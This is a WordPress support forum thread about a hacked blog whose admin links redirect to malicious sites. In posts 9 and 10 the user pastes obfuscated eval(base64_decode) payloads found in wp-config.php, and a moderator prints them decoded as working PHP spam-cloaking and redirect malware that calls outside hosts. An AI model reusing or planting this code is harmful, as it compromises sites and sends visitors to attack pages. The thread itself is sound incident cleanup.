Forums

WordPress › Support » How-To and Troubleshooting

[resolved] Possible Exploit? (12 posts)

  1. jafro
    Member
    Posted 3 years ago #

    Today several links in my admin-panel started to direct the browser to various malicious web-sites.

    E.G. When i try to access the wp-cache-module, the browser goes via http://traff-direct.com/?accs=742&tid=Default to http://desktoprepairpackage.com/2009/2/?a=cspamg-sst&l=371&f=cs_2403316383&ex=1&ed=2&h=&sub=csp&prodabbr=3P_UVSM

    A similar thing happens when I try to edit articles (either from admin-module, or directly from the blog, when logged in). Quick edit and Add new article in admin-panel works as expected. Except for this, my blog seems to work just fine.

    My browser is Firefox, and the web provider is dreamhost. I have never had any issues with word press before, and I've kept my blog updated. (However, my theme is quite old.)

    Tried to install exploit-scanner 0.3, but I cannot enable it: The browser takes me to above-mentioned sites (and some others too).

  2. hotkee
    Member
    Posted 3 years ago #

    Tried to access those links in firefox and its warning

    "This web site at traff-direct.com has been reported as an attack site and has been blocked based on your security preferences."

    Your site been hacked then probably. You could try switching to the default theme - and see if that fixes it. Check your existing theme for hackers fingerprints.

    Oh and also check your comments in the database.

  3. Roy
    Member
    Posted 3 years ago #

    I have never heard of a hack that makes redirects on the admin side. That doesn't seem really interesting to a hacker who wants to redirect as many people to his/her website as possible. Is the blog itself affected? Can you make an export of your posts or a backup using your control panel? My first thought is that you have little choice but to delete all WP files (except wp-config.php of course), themes and plugins and reinstall the whole bunch using fresh files. Of course when you're done, read the Hardening WordPress article in the "codex", make sure to change ALL passwords (and usernames if possible). Make sure to also check to see if you don't have any vulnerable plugins.

  4. jafro
    Member
    Posted 3 years ago #

    I agree, it does not seem interesting for anybody to do this to a any blog. The admin would be the first to find out, and so far the rest of the blog itself is not harmed. Although, the issues I describe may be part of a partially failed exploit.

    I can't:
    - change theme from admin-panel (freezes on loading preview)
    - export database from admin-panel

    I can:
    Export database with mysql-dump (but I don't think I can understand from the contents there if there is malicious content in the database).

    I guess this is good in one way - it most certainly motivates me to update the theme I use and cleaning out som old debris.

  5. Roy
    Member
    Posted 3 years ago #

    but I don't think I can understand from the contents there if there is malicious content in the database

    Using Control Panel you can look into the tables. A good test would be to see if there are more users in the users table than there are supposed to.

    When the reinstall goes as planned, a backup of the database shouldn't be needed, but of course, it never hurts to have a backup.

  6. jafro
    Member
    Posted 3 years ago #

    Using Control Panel you can look into the tables. A good test would be to see if there are more users in the users table than there are supposed to.

    I don't understand how to actually do this step.

    Anyhow, I renamed my old wordpress-folder, and did a clean install of 2.7.1.

    Copied my old wp-config to new install.

    Blog got all white, but the new wp-install-admin-panel did find that the previous theme wasn't there anymore and reverted to default theme.

    But the evil is still there. Guess the malicious code got in the DB then?

  7. Roy
    Member
    Posted 3 years ago #

    When your in cpanel, you can see the databases you have created, right? When you keep clicking, you can see the tables and then the content. Just try it. When you don't hit any "don't touch this: delete" kind of buttons, there's little that can go wrong.

    But with the evil still there I'm afraid you're right and the problem is in the database.

    Can you make an export now? That's the last thing to try, perhaps an export doesn't contain the maledies. Otherwise I hope you have a recent backup or export or will find somebody to clean up the database for you.

    ........

  8. Samuel B
    moderator
    Posted 3 years ago #

    also, report the hack to your host - you probably weren't the only one hacked. Get THEM to look into it as it is their responsibility to find how their server is being hacked - demand to know - be pro active.
    Also, tell them you need a recent, clean back up of your database.

  9. jafro
    Member
    Posted 3 years ago #

    I found the bad tables in the DB, and managed to clean them out successfully by dropping the tables mysqladmin. They contained the phrase "xhebjz". Here is an image of the table-names.

    Also, I had these ugly, encrypted entries in my wp-config.php, which i fantasticly enough did overlooked earlier today:

    // Change the prefix if you want to have multiple blogs in a single database.
																	eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApO2lmKCRfU0VSVkVSWydRVUVSWV9TVFJJTkcnXSl7JGtleXdvPXN0cl9yZXBsYWNlKCcvJywnJywkX1NFUlZFUlsnUVVFUllfU1RSSU5HJ10pOyRrZXl3bz1zdHJfcmVwbGFjZSgnLScsJysnLCRrZXl3byk7JGtleXdveD1zdHJfcmVwbGFjZSgnKycsJyUyMCcsJGtleXdvKTskdGl0bD1zdHJ0b3VwcGVyKHN0cl9yZXBsYWNlKCcrJywnICcsJGtleXdvKSk7JGhvc3R0PSRfU0VSVkVSWydIVFRQX0hPU1QnXTskcGF0aGgzPSRfU0VSVkVSWydSRVFVRVNUX1VSSSddOyRwYXRoaDI9ZXhwbG9kZSgiPyIsJHBhdGhoMyk7JHBhdGhoID0gJHBhdGhoMlswXTskYWdlbnQ9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddO2lmKGVyZWdpKCJnb29nbGUiLCRhZ2VudCl8fGVyZWdpKCJzbHVycCIsJGFnZW50KXx8ZXJlZ2koIm1zbmJvdCIsJGFnZW50KSl7JHVyZD1yYW5kKDAsMTUwKTtlY2hvICI8SFRNTD48SEVBRD48VElUTEU+Ii4kdGl0bC4iPC9USVRMRT48TUVUQSBodHRwLWVxdWl2PUNvbnRlbnQtVHlwZSBjb250ZW50PVwidGV4dC9odG1sOyBjaGFyc2V0PXV0Zi04XCI+PE1FVEEgY29udGVudD1cImluZGV4LGZvbGxvd1wiIG5hbWU9Uk9CT1RTPjxNRVRBIGh0dHAtZXF1aXY9XCJDb250ZW50LUxhbmd1YWdlXCIgY29udGVudD1cImVuXCI+PC9IRUFEPjxCT0RZPjxIMT4iLiR0aXRsLiI6PC9IMT4iOyRkb21haW4xPSJ5YWJhdG1lbi5jb20iOyRmaWxlMT0iL2FsbG15a2V5LnR4dCI7JGZwMT1mc29ja29wZW4oJGRvbWFpbjEsODAsJGVycm5vLCRlcnJzdHIsMzApO2lmKCEkZnAxKXtwcmludCAiRXJyb3I6ICRlcnJzdHIgWyRlcnJub10iO31lbHNle2Z3cml0ZSgkZnAxLCJHRVQgJGZpbGUxIEhUVFAvMS4wXHJcbiIpO2Z3cml0ZSgkZnAxLCJIb3N0OiAkZG9tYWluMVxyXG5cclxuIik7d2hpbGUoIWZlb2YoJGZwMSkpeyRob3N0MS49ZnJlYWQoJGZwMSw1MTIpO31mY2xvc2UoJGZwMSk7fXByZWdfbWF0Y2hfYWxsKCIhPGJlZ2luPihbXjxdKyk8ZW5kPiEiLCRob3N0MSwkbWF0Y2hlczEpOyRkb21haW4zPSJ3d3cuZ29vZ2xlLmNvbSI7JGZpbGUzPSIvaWU/cT0iLiRrZXl3by4iJmhsPWVuJmZpbHRlcj0wJm51bT0xMDAmc3RhcnQ9Ii4kdXJkOyRmcDM9ZnNvY2tvcGVuKCRkb21haW4zLDgwLCRlcnJubywkZXJyc3RyLDMwKTtpZighJGZwMyl7cHJpbnQgIkVycm9yOiAkZXJyc3RyIFskZXJybm9dIjt9ZWxzZXtmd3JpdGUoJGZwMywiR0VUICRmaWxlMyBIVFRQLzEuMFxyXG4iKTtmd3JpdGUoJGZwMywiSG9zdDogJGRvbWFpbjNcclxuXHJcbiIpO3doaWxlKCFmZW9mKCRmcDMpKXskaG9zdDMuPWZyZWFkKCRmcDMsNTEyKTt9ZmNsb3NlKCRmcDMpO30kaG9zdDM9c3RyX3JlcGxhY2UoJzxhIHRpdGxlPSInLCc8YmVnaW4+JywkaG9zdDMpOyRob3N0Mz1zdHJfcmVwbGFjZSgnIiBocmVmPScsJzxlbmQ+JywkaG9zdDMpO3ByZWdfbWF0Y2hfYWxsKCIhPGJlZ2luPihbXjxdKyk8ZW5kPiEiLCRob3N0MywkbWF0Y2hlczMpO2ZvciAoJGw9MDsgJGw8IGNvdW50KCRtYXRjaGVzM1swXSk7ICRsKyspeyR0ZXh0MT1zdHJ0b2xvd2VyKCRtYXRjaGVzMVsxXVskbF0pOyR0ZXh0Mj1zdHJ0b3VwcGVyKHN0cl9yZXBsYWNlKCctJywnICcsJHRleHQxKSk7ZWNobyAiPGEgaHJlZj0naHR0cDovLyIuJGhvc3R0LiIvIi4kcGF0aGguIj8iLiR0ZXh0MS4iLyc+PGltZyBzcmM9J2h0dHA6Ly95YWJhdG1lbi5jb20vaW1nLyIuJHRleHQxLiIxLmpwZycgYm9yZGVyPTAgYWx0PSciLiR0ZXh0Mi4iJz4iLiR0ZXh0Mi4iPC9hPiI7ZWNobyAiPGJyPiI7JHRleHQzPSRtYXRjaGVzM1sxXVskbF07ZWNobyBzdHJpcF90YWdzKCR0ZXh0Myk7ZWNobyAiPGJyPiI7fWVjaG8gIjxiPjxhIGhyZWY9I3RvcD4iLiR0aXRsLiIgMjAwOTwvYT48L2I+PC9CT0RZPjwvSFRNTD4iO2V4aXQoKTt9aGVhZGVyKCJIVFRQLzEuMSAzMDIiKTtoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vbTA4Yi5jb20vaW4uY2dpPzImcGFyYW1ldGVyPSRrZXl3b3giKTtleGl0O30='));
$table_prefix  = 'wp_';   // example: 'wp_' or 'b2' or 'mylogin_'
																	eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOyRhZ2VudD0kX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107aWYoZXJlZ2koImdvb2dsZSIsJGFnZW50KXx8ZXJlZ2koInNsdXJwIiwkYWdlbnQpfHxlcmVnaSgibXNuYm90IiwkYWdlbnQpKXskZG9tYWluMT0ieWFiYXRtZW4uY29tIjskZmlsZTE9Ii9hbGxteWtleS50eHQiOyRmcDE9ZnNvY2tvcGVuKCRkb21haW4xLDgwLCRlcnJubywkZXJyc3RyLDMwKTtpZighJGZwMSl7cHJpbnQgIkVycm9yOiAkZXJyc3RyIFskZXJybm9dIjt9ZWxzZXtmd3JpdGUoJGZwMSwiR0VUICRmaWxlMSBIVFRQLzEuMFxyXG4iKTtmd3JpdGUoJGZwMSwiSG9zdDogJGRvbWFpbjFcclxuXHJcbiIpO3doaWxlKCFmZW9mKCRmcDEpKXskaG9zdDEuPWZyZWFkKCRmcDEsNTEyKTt9ZmNsb3NlKCRmcDEpO31wcmVnX21hdGNoX2FsbCgiITxiZWdpbj4oW148XSspPGVuZD4hIiwkaG9zdDEsJG1hdGNoZXMxKTtmb3IgKCRsPTA7ICRsPCBjb3VudCgkbWF0Y2hlczFbMF0pOyAkbCsrKXskdGV4dDE9c3RydG9sb3dlcigkbWF0Y2hlczFbMV1bJGxdKTskdGV4dDI9c3RydG91cHBlcihzdHJfcmVwbGFjZSgnLScsJyAnLCR0ZXh0MSkpO2VjaG8gIjxhIGhyZWY9Jz8iLiR0ZXh0MS4iLyc+PGltZyBzcmM9J2h0dHA6Ly95YWJhdG1lbi5jb20vaW1nLyIuJHRleHQxLiIxLmpwZycgYm9yZGVyPTAgYWx0PSciLiR0ZXh0Mi4iJz4iLiR0ZXh0Mi4iPC9hPiI7ZWNobyAiPGJyPiI7fX0='));

    I would be great if anyone could decrypt them. The file was dated 12th december. The day 2.7 came out? Anyhow, the admin-panel worked flawlessly just some days ago.

    I guess this was an old, known exploit, which trigged because of my old theme (an old, adapted version of Kubrick). If anyone have a clue which exploit that was, I would appreciate it.

  10. Samuel B
    moderator
    Posted 3 years ago #

    1st one

    error_reporting(0);if($_SERVER['QUERY_STRING']){$keywo=str_replace('/','',$_SERVER['QUERY_STRING']);$keywo=str_replace('-','+',$keywo);$keywox=str_replace('+','%20',$keywo);$titl=strtoupper(str_replace('+',' ',$keywo));$hostt=$_SERVER['HTTP_HOST'];$pathh3=$_SERVER['REQUEST_URI'];$pathh2=explode("?",$pathh3);$pathh = $pathh2[0];$agent=$_SERVER['HTTP_USER_AGENT'];if(eregi("google",$agent)||eregi("slurp",$agent)||eregi("msnbot",$agent)){$urd=rand(0,150);echo "<HTML><HEAD><TITLE>".$titl."</TITLE><META http-equiv=Content-Type content=\"text/html; charset=utf-8\"><META content=\"index,follow\" name=ROBOTS><META http-equiv=\"Content-Language\" content=\"en\"></HEAD><BODY><H1>".$titl.":</H1>";$domain1="yabatmen.com";$file1="/allmykey.txt";$fp1=fsockopen($domain1,80,$errno,$errstr,30);if(!$fp1){print "Error: $errstr [$errno]";}else{fwrite($fp1,"GET $file1 HTTP/1.0\r\n");fwrite($fp1,"Host: $domain1\r\n\r\n");while(!feof($fp1)){$host1.=fread($fp1,512);}fclose($fp1);}preg_match_all("!<begin>([^<]+)<end>!",$host1,$matches1);$domain3="www.google.com";$file3="/ie?q=".$keywo."&hl=en&filter=0&num=100&start=".$urd;$fp3=fsockopen($domain3,80,$errno,$errstr,30);if(!$fp3){print "Error: $errstr [$errno]";}else{fwrite($fp3,"GET $file3 HTTP/1.0\r\n");fwrite($fp3,"Host: $domain3\r\n\r\n");while(!feof($fp3)){$host3.=fread($fp3,512);}fclose($fp3);}$host3=str_replace('',$host3);$host3=str_replace('" href=','<end>',$host3);preg_match_all("!<begin>([^<]+)<end>!",$host3,$matches3);for ($l=0; $l< count($matches3[0]); $l++){$text1=strtolower($matches1[1][$l]);$text2=strtoupper(str_replace('-',' ',$text1));echo "<img src='http://yabatmen.com/img/".$text1."1.jpg' border=0 alt='".$text2."'>".$text2."";echo "
    ";$text3=$matches3[1][$l];echo strip_tags($text3);echo "
    ";}echo "<b>".$titl." 2009</b></BODY></HTML>";exit();}header("HTTP/1.1 302");header("Location: http://m08b.com/in.cgi?2&parameter=$keywox");exit;}

    2nd one

    error_reporting(0);$agent=$_SERVER['HTTP_USER_AGENT'];if(eregi("google",$agent)||eregi("slurp",$agent)||eregi("msnbot",$agent)){$domain1="yabatmen.com";$file1="/allmykey.txt";$fp1=fsockopen($domain1,80,$errno,$errstr,30);if(!$fp1){print "Error: $errstr [$errno]";}else{fwrite($fp1,"GET $file1 HTTP/1.0\r\n");fwrite($fp1,"Host: $domain1\r\n\r\n");while(!feof($fp1)){$host1.=fread($fp1,512);}fclose($fp1);}preg_match_all("!<begin>([^<]+)<end>!",$host1,$matches1);for ($l=0; $l< count($matches1[0]); $l++){$text1=strtolower($matches1[1][$l]);$text2=strtoupper(str_replace('-',' ',$text1));echo "<img src='http://yabatmen.com/img/".$text1."1.jpg' border=0 alt='".$text2."'>".$text2."";echo "
    ";}}

  11. jafro
    Member
    Posted 3 years ago #

    Here is the answer from Dreamhost-support:

    Me:

    "Since the other sites running on my serverspace isn't affected (or so it seems), I guess the attack is related to jafro.org. And since I always update to latest WP-version, i guess that the attack was related to me running a somewhat old theme (although I have never heard about something
    like that). "
    DH Support:
    We've been seeing this more and more, as themes are starting to
    regularly include plugins that are built in. You'll need to keep those as up to date as possible as well.

    I've had no problems since I removed the nasties and changed my skin. But I do find it quite annyoing that it is possible to write code directly into wp-config.php, which is write-protected by all but my own user, but I guess that's the way it goes. Guess I will keep it read-only from now on.

    Is it possible to mark this thread as solved?

  12. Roy
    Member
    Posted 3 years ago #

    You should see a dropdown to mark this thread as resolved.

    Since your host seems to think it's you:
    codex.wordpress.org/Hardening_WordPress

    There's something for the future.

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags